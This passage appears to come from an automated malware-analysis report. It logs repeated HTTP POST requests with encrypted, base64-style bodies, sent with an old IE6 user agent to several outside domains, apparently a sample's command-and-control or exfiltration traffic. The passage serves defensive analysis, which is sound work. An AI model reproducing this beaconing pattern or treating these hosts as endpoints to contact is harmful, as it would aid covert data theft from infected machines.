41 4e 58 2f 32 49 50 41 70 54 55 42 39 6e 65 55 53 56 4e 53 53 39 79 35 44 69 76 72 78 6f 4a 64 58 45 48 30 2f 65 70 64 57 37 32 47 39 58 5a 75 58 35 5a 61 38 45 4f 78 6a 5a 35 7a 46 33 77 4f 53 31 6b 47 58 50 61 51 63 61 36 5a 51 76 49 4a 7a 66 67 41 6f 4e 66 6f 30 45 39 6f 55 63 70 2b 59 4f 79 52 78 6c 4e 54 75 4f 72 2f 38 6d 30 53 64 4b 6e 32 42 75 79 76 7a 6a 51 49 58 31 34 76 49 69 69 6f 73 39 47 50 36 6f 4e 71 31 65 5a 6e 75 6d 54 47 6d 42 54 71 4a 78 75 74 76 49 6f 54 38 64 2b 78 2f 41 75 6f 78 4e 71 63 53 37 45 44 58 74 53 6d 41 47 6a 7a 67 57 2b 64 66 54 6d 78 49 65 54 76 47 6e 57 6c 31 73 54 6c 6d 62 67 53 5a 79 64 6b 51 38 6b 77 6e 7a 58 5a 4b 71 49 4a 59 59 76 66 41 41 37 36 39 4c 43 42 71 38 39 72 6d 68 68 7a 71 2f 45 51 2b 45 6e 32 6c 78 72 2b 63 72 41 77 61 74 74 75 62 4e 34 6f 48 30 4f 47 46 31 33 33 49 69 78 48 2b 64 30 42 79 4c 52 58 47 54 51 67 78 51 2f 4b 66 6f 66 30 76 6c 62 46 65 76 55 74 70 35 70 72 36 78 51 38 6c 57 35 50 55 76 39 56 71 73 6e 63 4a 74 6f 6e 78 6c 5a 68 5a 31 45 68 6f 51 2b 4a 76 36 4c 4f 48 79 4f 72 2b 36 48 78 6d 38 64 72 47 6a 48 61 73 57 6b 35 67 2b 75 32 63 2b 73 51 52 49 6b 64 46 5a 4b 75 7a 57 74 4a 66 69 58 56 33 6c 6b 6d 36 58 45 64 30 37 2f 64 31 4d 2f 74 6b 5a 36 52 6b 3d Data Ascii: jrdXfcX+pQyj6vew7GGc5T4njLaTmYr7ycf/9SsvWr9LvO4+B7c2Xlo3HT8aAkJxElhWyOCL+EYypeakLU72ymExsX1R9kIibjLHHmq7cSAUEZSPqDMnnhCOFc007ObpPtQ3e0sg3VPOpJE8fus8yHjWljWaw2FZ70mVyxr3CYANX/2IPApTUB9neUSVNSS9y5DivrxoJdXEH0/epdW72G9XZuX5Za8EOxjZ5zF3wOS1kGXPaQca6ZQvIJzfgAoNfo0E9oUcp+YOyRxlNTuOr/8m0SdKn2BuyvzjQIX14vIiios9GP6oNq1eZnumTGmBTqJxutvIoT8d+x/AuoxNqcS7EDXtSmAGjzgW+dfTmxIeTvGnWl1sTlmbgSZydkQ8kwnzXZKqIJYYvfAA769LCBq89rmhhzq/EQ+En2lxr+crAwattubN4oH0OGF133IixH+d0ByLRXGTQgxQ/Kfof0vlbFevUtp5pr6xQ8lW5PUv9VqsncJtonxlZhZ1EhoQ+Jv6LOHyOr+6Hxm8drGjHasWk5g+u2c+sQRIkdFZKuzWtJfiXV3lkm6XEd07/d1M/tkZ6Rk=
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 584User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.dayvo.comCache-Control: no-cacheData Raw: 6a 72 64 58 66 63 58 2b 70 51 79 6a 36 76 65 77 37 47 47 63 35 54 34 6e 6a 4c 61 54 6d 59 72 37 79 63 66 2f 39 53 73 76 57 72 39 4c 76 4f 34 2b 42 37 63 32 58 6c 6f 33 48 54 38 61 41 6b 4a 78 45 6c 68 57 79 4f 43 4c 2b 45 59 79 70 65 61 6b 4c 55 37 32 79 6d 45 78 73 58 31 52 39 6b 49 69 62 6a 4c 48 48 6d 71 37 63 53 41 55 45 5a 53 50 71 44 4d 6e 6e 68 43 4f 46 63 30 30 37 4f 62 70 50 74 51 33 65 30 73 67 33 56 50 4f 70 4a 45 38 66 75 73 38 79 48 6a 57 6c 6a 57 61 77 32 46 5a 37 30 6d 56 79 78 72 33 43 59 41 4e 58 2f 32 49 50 41 70 54 55 42 39 6e 65 55 53 56 4e 53 53 39 79 35 44 69 76 72 78 6f 4a 64 58 45 48 30 2f 65 70 64 57 37 32 47 39 58 5a 75 58 35 5a 61 38 45 4f 78 6a 5a 35 7a 46 33 77 4f 53 31 6b 47 58 50 61 51 63 61 36 5a 51 76 49 4a 7a 66 67 41 6f 4e 66 6f 30 45 39 6f 55 63 70 2b 59 4f 79 52 78 6c 4e 54 75 4f 72 2f 38 6d 30 53 64 4b 6e 32 42 75 79 76 7a 6a 51 49 58 31 34 76 49 69 69 6f 73 39 47 50 36 6f 4e 71 31 65 5a 6e 75 6d 54 47 6d 42 54 71 4a 78 75 74 76 49 6f 54 38 64 2b 78 2f 41 75 6f 78 4e 71 63 53 37 45 44 58 74 53 6d 41 47 6a 7a 67 57 2b 64 66 54 6d 78 49 65 54 76 47 6e 57 6c 31 73 54 6c 6d 62 67 53 5a 79 64 6b 51 38 6b 77 6e 7a 58 5a 4b 71 49 4a 59 59 76 66 41 41 37 36 39 4c 43 42 71 38 39 72 6d 68 68 7a 71 2f 45 51 2b 45 6e 32 6c 78 72 2b 63 72 41 77 61 74 74 75 62 4e 34 6f 48 30 4f 47 46 31 33 33 49 69 78 48 2b 64 30 42 79 4c 52 58 47 54 51 67 78 51 2f 4b 66 6f 66 30 76 6c 62 46 65 76 55 74 70 35 70 72 36 78 51 38 6c 57 35 50 55 76 39 56 71 73 6e 63 4a 74 6f 6e 78 6c 5a 68 5a 31 45 68 6f 51 2b 4a 76 36 4c 4f 48 79 4f 72 2b 36 48 78 6d 38 64 72 47 6a 48 61 73 57 6b 35 67 2b 75 32 63 2b 73 51 52 49 6b 64 46 5a 4b 75 7a 57 74 4a 66 69 58 56 33 6c 6b 6d 36 58 45 64 30 37 2f 64 31 4d 2f 74 6b 5a 36 52 6b 3d Data Ascii: jrdXfcX+pQyj6vew7GGc5T4njLaTmYr7ycf/9SsvWr9LvO4+B7c2Xlo3HT8aAkJxElhWyOCL+EYypeakLU72ymExsX1R9kIibjLHHmq7cSAUEZSPqDMnnhCOFc007ObpPtQ3e0sg3VPOpJE8fus8yHjWljWaw2FZ70mVyxr3CYANX/2IPApTUB9neUSVNSS9y5DivrxoJdXEH0/epdW72G9XZuX5Za8EOxjZ5zF3wOS1kGXPaQca6ZQvIJzfgAoNfo0E9oUcp+YOyRxlNTuOr/8m0SdKn2BuyvzjQIX14vIiios9GP6oNq1eZnumTGmBTqJxutvIoT8d+x/AuoxNqcS7EDXtSmAGjzgW+dfTmxIeTvGnWl1sTlmbgSZydkQ8kwnzXZKqIJYYvfAA769LCBq89rmhhzq/EQ+En2lxr+crAwattubN4oH0OGF133IixH+d0ByLRXGTQgxQ/Kfof0vlbFevUtp5pr6xQ8lW5PUv9VqsncJtonxlZhZ1EhoQ+Jv6LOHyOr+6Hxm8drGjHasWk5g+u2c+sQRIkdFZKuzWtJfiXV3lkm6XEd07/d1M/tkZ6Rk=
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 568User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.crcsi.orgCache-Control: no-cacheData Raw: 6b 4b 52 51 38 7a 37 45 77 67 78 62 62 76 76 41 43 5a 36 52 70 69 48 38 2b 54 48 2b 38 6f 45 79 55 73 69 73 6b 39 6e 55 59 78 66 48 48 2b 5a 36 76 66 6b 63 54 39 78 54 59 47 39 45 34 64 41 35 68 46 2b 4e 57 42 70 53 50 53 67 55 72 61 37 53 49 37 6b 66 46 77 64 46 52 6f 52 5a 67 58 44 35 70 32 73 75 6d 67 2b 4c 52 76 44 70 6a 42 67 75 68 53 55 6b 4e 69 2b 4d 31 49 6b 71 32 41 6e 4a 55 4a 34 47 35 5a 51 45 67 69 72 49 33 35 62 5a 64 36 6c 62 61 2f 6c 57 70 57 31 6a 76 53 44 62 39 62 48 59 4f 4b 58 6e 33 45 59 38 57 6d 44 51 2f 50 72 71 44 77 54 59 63 51 71 36 64 33 65 2f 39 53 6a 6b 4a 77 77 35 41 73 31 79 57 6c 78 70 66 45 30 4c 4c 34 2b 4f 58 4b 50 6b 67 73 33 6b 46 58 7a 43 4e 34 41 31 46 47 4e 54 45 72 2f 39 30 7a 65 72 42 74 62 2f 30 33 56 42 63 35 41 48 65 79 2f 79 73 43 7a 7a 48 36 4a 79 58 4e 6f 44 42 49 4c 61 6a 66 73 47 47 31 69 54 56 37 43 41 70 39 63 4a 6b 4e 47 79 33 56 59 53 66 2f 76 42 58 33 30 69 62 58 33 61 37 4f 70 6e 56 71 76 38 4a 2f 36 43 6e 78 32 53 54 45 55 74 71 65 31 43 53 49 45 36 72 6b 5a 30 44 31 65 6f 4d 47 65 61 6f 49 36 76 62 46 52 2f 30 65 56 37 56 43 32 32 7a 41 79 44 4c 78 35 64 4c 32 67 49 48 70 47 49 39 6c 41 66 56 51 54 70 7a 6a 78 49 63 75 65 4e 4b 63 73 77 68 2f 55 4b 65 47 34 58 63 4c 7a 55 66 45 42 64 33 52 78 34 55 46 30 79 65 31 49 66 73 55 69 72 6b 4e 62 41 4f 61 54 62 4e 4a 5a 50 50 55 4d 73 31 4a 68 47 5a 54 68 30 50 68 36 56 57 61 4a 67 70 78 72 48 6e 31 73 41 30 30 59 5a 76 76 54 52 41 31 41 52 42 75 74 59 41 6f 50 72 6d 55 74 4f 71 6a 6c 32 2b 75 79 62 46 34 33 35 79 78 58 4a 44 68 64 45 48 54 51 6d 46 55 67 6c 6b 45 37 47 38 43 4e 50 4c 46 69 4f 43 36 56 43 39 66 54 41 4c 65 2b 4b 6a 56 58 31 45 4d 73 76 4b 74 65 54 59 41 3d 3d Data Ascii: kKRQ8z7EwgxbbvvACZ6RpiH8+TH+8oEyUsisk9nUYxfHH+Z6vfkcT9xTYG9E4dA5hF+NWBpSPSgUra7SI7kfFwdFRoRZgXD5p2sumg+LRvDpjBguhSUkNi+M1Ikq2AnJUJ4G5ZQEgirI35bZd6lba/lWpW1jvSDb9bHYOKXn3EY8WmDQ/PrqDwTYcQq6d3e/9SjkJww5As1yWlxpfE0LL4+OXKPkgs3kFXzCN4A1FGNTEr/90zerBtb/03VBc5AHey/ysCzzH6JyXNoDBILajfsGG1iTV7CAp9cJkNGy3VYSf/vBX30ibX3a7OpnVqv8J/6Cnx2STEUtqe1CSIE6rkZ0D1eoMGeaoI6vbFR/0eV7VC22zAyDLx5dL2gIHpGI9lAfVQTpzjxIcueNKcswh/UKeG4XcLzUfEBd3Rx4UF0ye1IfsUirkNbAOaTbNJZPPUMs1JhGZTh0Ph6VWaJgpxrHn1sA00YZvvTRA1ARButYAoPrmUtOqjl2+uybF435yxXJDhdEHTQmFUglkE7G8CNPLFiOC6VC9fTALe+KjVX1EMsvKteTYA==
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 536User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.stajum.comCache-Control: no-cacheData Raw: 76 62 47 5a 59 75 6a 41 74 51 7a 37 55 43 4d 57 71 79 38 75 49 31 76 67 58 77 66 77 4a 55 66 72 6e 45 71 6b 4e 45 61 50 2b 74 66 58 48 41 30 35 76 4d 69 62 73 38 62 76 55 75 62 65 68 63 79 33 75 31 4b 51 35 6a 6b 39 66 58 70 38 6f 70 33 4c 67 52 32 4a 76 6e 45 36 67 38 65 55 56 6b 61 70 49 4f 4a 6d 43 72 4c 32 70 48 39 6f 76 4c 70 31 77 4e 4c 6e 69 61 4a 74 4a 39 67 37 55 51 31 68 35 4a 71 6e 2f 61 34 37 56 65 6e 44 69 6a 48 6d 6d 4a 51 63 4c 4a 48 56 4d 2f 56 74 5a 57 75 6d 4d 70 2b 4d 50 78 50 43 78 75 4b 70 68 61 58 34 53 6c 58 73 41 73 6b 44 77 36 6e 46 59 61 64 73 59 34 43 78 56 73 2b 36 31 4c 76 47 64 35 39 64 48 42 6b 41 53 62 76 4d 68 68 71 6c 56 6f 49 32 44 65 53 47 34 4b 4c 4f 78 70 75 37 4a 6d 49 34 41 50 52 2f 2b 73 73 79 47 52 66 43 38 4b 64 57 54 4c 6e 63 73 66 69 4d 76 51 6f 6a 63 39 73 30 6e 56 70 5a 57 39 51 64 6d 56 39 42 4d 53 53 55 76 72 51 7a 62 37 61 30 72 2b 59 30 37 6c 2f 68 53 68 66 6d 2b 73 4a 41 35 43 74 77 42 70 4a 61 39 41 70 41 45 6c 52 50 57 71 65 53 41 75 4e 47 39 56 61 30 35 69 69 66 4b 72 6a 53 59 45 70 33 6f 47 76 30 6f 30 71 31 58 6a 48 56 6c 36 44 5a 52 33 4d 50 58 51 4b 65 68 45 41 53 77 73 51 52 41 72 46 72 77 59 45 64 57 41 69 5a 57 61 4a 67 6b 38 48 55 7a 59 6c 76 2b 42 32 6a 37 74 39 4f 5a 37 4c 69 4d 4b 66 4f 36 49 2b 2f 4b 4b 64 37 58 6b 33 67 2f 56 66 70 6e 77 46 6f 5a 47 62 34 41 39 34 4b 62 6c 6b 5a 56 62 36 70 47 77 30 31 5a 4e 4f 73 71 6a 35 54 74 66 6b 2b 43 73 6a 6d 75 51 65 51 69 38 7a 74 54 2f 37 79 4b 44 31 4b 6c 73 38 4d 58 5a 72 54 33 78 75 74 42 6f 7a 6c 72 5a 56 64 42 6e 4c 30 6c 47 6f 32 79 34 42 6b 7a 6d 67 42 6e 58 55 3d Data Ascii: vbGZYujAtQz7UCMWqy8uI1vgXwfwJUfrnEqkNEaP+tfXHA05vMibs8bvUubehcy3u1KQ5jk9fXp8op3LgR2JvnE6g8eUVkapIOJmCrL2pH9ovLp1wNLniaJtJ9g7UQ1h5Jqn/a47VenDijHmmJQcLJHVM/VtZWumMp+MPxPCxuKphaX4SlXsAskDw6nFYadsY4CxVs+61LvGd59dHBkASbvMhhqlVoI2DeSG4KLOxpu7JmI4APR/+ssyGRfC8KdWTLncsfiMvQojc9s0nVpZW9QdmV9BMSSUvrQzb7a0r+Y07l/hShfm+sJA5CtwBpJa9ApAElRPWqeSAuNG9Va05iifKrjSYEp3oGv0o0q1XjHVl6DZR3MPXQKehEASwsQRArFrwYEdWAiZWaJgk8HUzYlv+B2j7t9OZ7LiMKfO6I+/KKd7Xk3g/VfpnwFoZGb4A94KblkZVb6pGw01ZNOsqj5Ttfk+CsjmuQeQi8ztT/7yKD1Kls8MXZrT3xutBozlrZVdBnL0lGo2y4BkzmgBnXU=
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 536User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.stajum.comCache-Control: no-cacheData Raw: 76 62 47 5a 59 75 6a 41 74 51 7a 37 55 43 4d 57 71 79 38 75 49 31 76 67 58 77 66 77 4a 55 66 72 6e 45 71 6b 4e 45 61 50 2b 74 66 58 48 41 30 35 76 4d 69 62 73 38 62 76 55 75 62 65 68 63 79 33 75 31 4b 51 35 6a 6b 39 66 58 70 38 6f 70 33 4c 67 52 32 4a 76 6e 45 36 67 38 65 55 56 6b 61 70 49 4f 4a 6d 43 72 4c 32 70 48 39 6f 76 4c 70 31 77 4e 4c 6e 69 61 4a 74 4a 39 67 37 55 51 31 68 35 4a 71 6e 2f 61 34 37 56 65 6e 44 69 6a 48 6d 6d 4a 51 63 4c 4a 48 56 4d 2f 56 74 5a 57 75 6d 4d 70 2b 4d 50 78 50 43 78 75 4b 70 68 61 58 34 53 6c 58 73 41 73 6b 44 77 36 6e 46 59 61 64 73 59 34 43 78 56 73 2b 36 31 4c 76 47 64 35 39 64 48 42 6b 41 53 62 76 4d 68 68 71 6c 56 6f 49 32 44 65 53 47 34 4b 4c 4f 78 70 75 37 4a 6d 49 34 41 50 52 2f 2b 73 73 79 47 52 66 43 38 4b 64 57 54 4c 6e 63 73 66 69 4d 76 51 6f 6a 63 39 73 30 6e 56 70 5a 57 39 51 64 6d 56 39 42 4d 53 53 55 76 72 51 7a 62 37 61 30 72 2b 59 30 37 6c 2f 68 53 68 66 6d 2b 73 4a 41 35 43 74 77 42 70 4a 61 39 41 70 41 45 6c 52 50 57 71 65 53 41 75 4e 47 39 56 61 30 35 69 69 66 4b 72 6a 53 59 45 70 33 6f 47 76 30 6f 30 71 31 58 6a 48 56 6c 36 44 5a 52 33 4d 50 58 51 4b 65 68 45 41 53 77 73 51 52 41 72 46 72 77 59 45 64 57 41 69 5a 57 61 4a 67 6b 38 48 55 7a 59 6c 76 2b 42 32 6a 37 74 39 4f 5a 37 4c 69 4d 4b 66 4f 36 49 2b 2f 4b 4b 64 37 58 6b 33 67 2f 56 66 70 6e 77 46 6f 5a 47 62 34 41 39 34 4b 62 6c 6b 5a 56 62 36 70 47 77 30 31 5a 4e 4f 73 71 6a 35 54 74 66 6b 2b 43 73 6a 6d 75 51 65 51 69 38 7a 74 54 2f 37 79 4b 44 31 4b 6c 73 38 4d 58 5a 72 54 33 78 75 74 42 6f 7a 6c 72 5a 56 64 42 6e 4c 30 6c 47 6f 32 79 34 42 6b 7a 6d 67 42 6e 58 55 3d Data Ascii: vbGZYujAtQz7UCMWqy8uI1vgXwfwJUfrnEqkNEaP+tfXHA05vMibs8bvUubehcy3u1KQ5jk9fXp8op3LgR2JvnE6g8eUVkapIOJmCrL2pH9ovLp1wNLniaJtJ9g7UQ1h5Jqn/a47VenDijHmmJQcLJHVM/VtZWumMp+MPxPCxuKphaX4SlXsAskDw6nFYadsY4CxVs+61LvGd59dHBkASbvMhhqlVoI2DeSG4KLOxpu7JmI4APR/+ssyGRfC8KdWTLncsfiMvQojc9s0nVpZW9QdmV9BMSSUvrQzb7a0r+Y07l/hShfm+sJA5CtwBpJa9ApAElRPWqeSAuNG9Va05iifKrjSYEp3oGv0o0q1XjHVl6DZR3MPXQKehEASwsQRArFrwYEdWAiZWaJgk8HUzYlv+B2j7t9OZ7LiMKfO6I+/KKd7Xk3g/VfpnwFoZGb4A94KblkZVb6pGw01ZNOsqj5Ttfk+CsjmuQeQi8ztT/7yKD1Kls8MXZrT3xutBozlrZVdBnL0lGo2y4BkzmgBnXU=
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 588User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.ora-ito.comCache-Control: no-cacheData Raw: 55 32 5a 6b 6b 61 4d 32 30 41 78 46 6f 7a 75 6e 4b 71 75 78 4c 73 7a 4d 44 69 6e 4a 53 5a 70 71 68 2f 35 41 58 4e 5a 59 74 33 42 46 6d 51 30 4f 6d 74 78 39 51 6d 61 30 54 32 5a 44 66 4d 35 50 73 32 6d 47 6b 68 76 50 69 4a 2f 6a 52 7a 32 63 32 48 31 6a 62 66 2f 69 37 4c 67 77 37 64 30 76 62 33 37 59 5a 4d 6d 51 4d 7a 79 35 55 59 68 71 73 39 75 66 76 4a 66 55 64 4f 47 74 4b 7a 71 72 71 34 68 6e 34 41 51 52 73 35 35 78 4c 4b 31 39 78 67 69 47 77 64 63 6b 35 7a 33 58 2b 64 4a 36 36 51 4b 37 6b 77 5a 4c 36 61 74 78 59 38 53 6d 38 70 64 73 37 72 53 45 61 79 66 6f 4b 33 4e 47 2f 61 76 33 75 2b 51 45 75 46 6d 2b 4a 31 34 4b 5a 78 42 55 65 31 4d 57 71 74 33 67 38 34 43 4e 2f 45 73 34 6b 76 77 51 32 55 2f 69 47 74 51 54 66 49 50 4f 4e 66 6b 35 30 56 35 73 49 32 51 6e 6a 68 6f 5a 72 6d 36 68 47 6b 35 34 42 44 4c 49 4d 78 2b 78 78 67 59 78 6d 74 45 4e 31 6b 35 78 61 64 59 54 45 50 53 6b 7a 36 59 50 50 76 54 46 44 72 51 4d 7a 59 4f 2b 74 34 48 6b 4b 58 37 47 63 6b 72 35 56 79 37 64 4b 4b 62 68 68 37 33 68 62 51 58 61 79 4a 57 6d 4d 78 74 67 31 35 43 4c 4a 41 76 78 62 66 6a 6d 58 47 76 57 66 42 45 34 53 35 6e 73 58 71 75 4e 35 57 59 49 31 48 50 69 52 42 56 4a 77 67 30 6a 73 76 35 52 55 75 34 36 36 78 34 2b 46 78 39 4e 79 46 57 44 79 59 46 68 76 69 44 34 30 38 65 43 35 62 59 6a 34 2f 43 52 56 33 48 78 54 53 61 44 32 35 2f 6e 30 57 46 62 2f 7a 6d 51 67 55 77 6d 62 58 67 59 70 76 51 75 63 4d 52 36 6a 57 41 46 50 68 31 53 63 64 2b 31 49 6f 53 69 63 30 69 6d 75 57 6d 79 37 64 6e 6e 39 64 4d 59 4b 32 4b 57 69 2f 71 6d 76 7a 73 52 53 42 78 67 56 47 62 39 61 74 69 4c 51 6e 6b 6a 73 36 76 67 33 38 70 44 71 44 6d 79 31 64 66 43 4c 47 53 5a 41 44 57 69 50 45 63 71 57 67 4a 61 6b 32 4d 4c 73 72 72 4c 72 4d 32 61 72 34 59 65 4a 57 43 77 31 55 30 4a 73 6e 4d 3d Data Ascii: U2ZkkaM20AxFozunKquxLszMDinJSZpqh/5AXNZYt3BFmQ0Omtx9Qma0T2ZDfM5Ps2mGkhvPiJ/jRz2c2H1jbf/i7Lgw7d0vb37YZMmQMzy5UYhqs9ufvJfUdOGtKzqrq4hn4AQRs55xLK19xgiGwdck5z3X+dJ66QK7kwZL6atxY8Sm8pds7rSEayfoK3NG/av3u+QEuFm+J14KZxBUe1MWqt3g84CN/Es4kvwQ2U/iGtQTfIPONfk50V5sI2QnjhoZrm6hGk54BDLIMx+xxgYxmtEN1k5xadYTEPSkz6YPPvTFDrQMzYO+t4HkKX7Gckr5Vy7dKKbhh73hbQXayJWmMxtg15CLJAvxbfjmXGvWfBE4S5nsXquN5WYI1HPiRBVJwg0jsv5RUu466x4+Fx9NyFWDyYFhviD408eC5bYj4/CRV3HxTSaD25/n0WFb/zmQgUwmbXgYpvQucMR6jWAFPh1Scd+1IoSic0imuWmy7dnn9dMYK2KWi/qmvzsRSBxgVGb9atiLQnkjs6vg38pDqDmy1dfCLGSZADWiPEcqWgJak2MLsrrLrM2ar4YeJWCw1U0JsnM=
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 588User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.ora-ito.comCache-Control: no-cacheData Raw: 55 32 5a 6b 6b 61 4d 32 30 41 78 46 6f 7a 75 6e 4b 71 75 78 4c 73 7a 4d 44 69 6e 4a 53 5a 70 71 68 2f 35 41 58 4e 5a 59 74 33 42 46 6d 51 30 4f 6d 74 78 39 51 6d 61 30 54 32 5a 44 66 4d 35 50 73 32 6d 47 6b 68 76 50 69 4a 2f 6a 52 7a 32 63 32 48 31 6a 62 66 2f 69 37 4c 67 77 37 64 30 76 62 33 37 59 5a 4d 6d 51 4d 7a 79 35 55 59 68 71 73 39 75 66 76 4a 66 55 64 4f 47 74 4b 7a 71 72 71 34 68 6e 34 41 51 52 73 35 35 78 4c 4b 31 39 78 67 69 47 77 64 63 6b 35 7a 33 58 2b 64 4a 36 36 51 4b 37 6b 77 5a 4c 36 61 74 78 59 38 53 6d 38 70 64 73 37 72 53 45 61 79 66 6f 4b 33 4e 47 2f 61 76 33 75 2b 51 45 75 46 6d 2b 4a 31 34 4b 5a 78 42 55 65 31 4d 57 71 74 33 67 38 34 43 4e 2f 45 73 34 6b 76 77 51 32 55 2f 69 47 74 51 54 66 49 50 4f 4e 66 6b 35 30 56 35 73 49 32 51 6e 6a 68 6f 5a 72 6d 36 68 47 6b 35 34 42 44 4c 49 4d 78 2b 78 78 67 59 78 6d 74 45 4e 31 6b 35 78 61 64 59 54 45 50 53 6b 7a 36 59 50 50 76 54 46 44 72 51 4d 7a 59 4f 2b 74 34 48 6b 4b 58 37 47 63 6b 72 35 56 79 37 64 4b 4b 62 68 68 37 33 68 62 51 58 61 79 4a 57 6d 4d 78 74 67 31 35 43 4c 4a 41 76 78 62 66 6a 6d 58 47 76 57 66 42 45 34 53 35 6e 73 58 71 75 4e 35 57 59 49 31 48 50 69 52 42 56 4a 77 67 30 6a 73 76 35 52 55 75 34 36 36 78 34 2b 46 78 39 4e 79 46 57 44 79 59 46 68 76 69 44 34 30 38 65 43 35 62 59 6a 34 2f 43 52 56 33 48 78 54 53 61 44 32 35 2f 6e 30 57 46 62 2f 7a 6d 51 67 55 77 6d 62 58 67 59 70 76 51 75 63 4d 52 36 6a 57 41 46 50 68 31 53 63 64 2b 31 49 6f 53 69 63 30 69 6d 75 57 6d 79 37 64 6e 6e 39 64 4d 59 4b 32 4b 57 69 2f 71 6d 76 7a 73 52 53 42 78 67 56 47 62 39 61 74 69 4c 51 6e 6b 6a 73 36 76 67 33 38 70 44 71 44 6d 79 31 64 66 43 4c 47 53 5a 41 44 57 69 50 45 63 71 57 67 4a 61 6b 32 4d 4c 73 72 72 4c 72 4d 32 61 72 34 59 65 4a 57 43 77 31 55 30 4a 73 6e 4d 3d Data Ascii: U2ZkkaM20AxFozunKquxLszMDinJSZpqh/5AXNZYt3BFmQ0Omtx9Qma0T2ZDfM5Ps2mGkhvPiJ/jRz2c2H1jbf/i7Lgw7d0vb37YZMmQMzy5UYhqs9ufvJfUdOGtKzqrq4hn4AQRs55xLK19xgiGwdck5z3X+dJ66QK7kwZL6atxY8Sm8pds7rSEayfoK3NG/av3u+QEuFm+J14KZxBUe1MWqt3g84CN/Es4kvwQ2U/iGtQTfIPONfk50V5sI2QnjhoZrm6hGk54BDLIMx+xxgYxmtEN1k5xadYTEPSkz6YPPvTFDrQMzYO+t4HkKX7Gckr5Vy7dKKbhh73hbQXayJWmMxtg15CLJAvxbfjmXGvWfBE4S5nsXquN5WYI1HPiRBVJwg0jsv5RUu466x4+Fx9NyFWDyYFhviD408eC5bYj4/CRV3HxTSaD25/n0WFb/zmQgUwmbXgYpvQucMR6jWAFPh1Scd+1IoSic0imuWmy7dnn9dMYK2KWi/qmvzsRSBxgVGb9atiLQnkjs6vg38pDqDmy1dfCLGSZADWiPEcqWgJak2MLsrrLrM2ar4YeJWCw1U0JsnM=
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 556User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.railbook.netCache-Control: no-cacheData Raw: 34 79 5a 70 64 73 7a 32 33 77 77 6f 4e 37 4b 47 4e 38 4d 50 4f 74 39 6e 65 35 53 6b 2b 2f 66 6a 77 4a 54 79 33 32 58 54 64 74 6e 39 49 47 72 77 52 34 66 41 69 64 4d 54 4d 2f 45 4e 2f 50 30 74 32 74 39 2b 68 4b 34 6d 67 6f 35 49 37 4f 50 68 70 4f 78 38 59 44 77 69 47 78 67 32 54 54 61 70 4a 48 30 4a 2f 78 65 70 31 72 34 4a 6a 2b 76 4f 46 54 71 56 66 2b 41 4c 49 48 33 2f 54 73 52 6f 53 55 35 2f 66 58 73 35 4d 42 36 42 63 41 38 6a 6e 6a 6e 62 31 67 65 67 6f 38 55 52 63 61 51 54 2b 63 6c 6c 47 78 2f 41 63 6a 77 52 32 54 73 6a 53 2b 59 6a 6e 51 46 54 75 41 68 5a 68 57 42 32 56 54 6a 73 32 4e 44 53 71 58 6c 76 2f 70 42 49 4c 75 65 5a 6c 2b 57 56 51 63 38 43 6d 33 31 6d 6c 32 54 64 46 62 47 69 33 77 30 6c 74 36 44 69 41 62 76 59 74 70 30 73 65 38 2f 43 74 58 41 58 6b 50 53 76 4c 6c 74 4a 56 2f 41 30 32 52 6a 79 62 63 57 4d 43 54 78 77 66 42 6c 79 4c 71 71 65 4d 68 47 70 38 43 33 64 78 4e 4b 51 67 2f 65 65 73 6e 45 53 43 78 57 7a 55 56 6b 46 51 4f 48 5a 4e 41 78 35 79 57 6b 57 2f 6b 41 45 48 70 46 2f 32 78 30 31 47 74 59 64 48 59 79 75 48 78 75 4d 44 67 4a 69 36 74 74 79 6f 75 75 64 42 54 33 49 52 35 64 71 54 44 41 55 43 58 54 50 74 78 46 33 74 52 6b 76 45 48 61 74 45 47 31 56 50 79 32 72 65 57 39 4a 67 44 62 4f 6e 64 6b 42 2f 5a 62 63 5a 43 72 79 68 55 4e 4f 61 57 33 54 32 4c 2b 5a 4a 63 35 36 32 34 56 52 47 76 37 5a 66 34 39 41 66 73 48 6f 75 37 58 44 56 30 33 4c 71 76 6f 4d 68 65 48 4b 49 31 71 77 44 5a 62 4f 36 6f 35 52 6b 46 67 54 32 54 31 31 38 42 64 42 59 6b 39 42 76 73 44 69 72 71 4b 44 70 49 73 6e 65 35 63 45 45 4b 4f 64 34 62 45 66 66 63 55 37 71 76 6d 56 78 47 43 52 46 41 63 44 31 4b 77 2f 5a 44 32 32 55 73 5a 36 4c 59 69 74 50 31 59 3d Data Ascii: 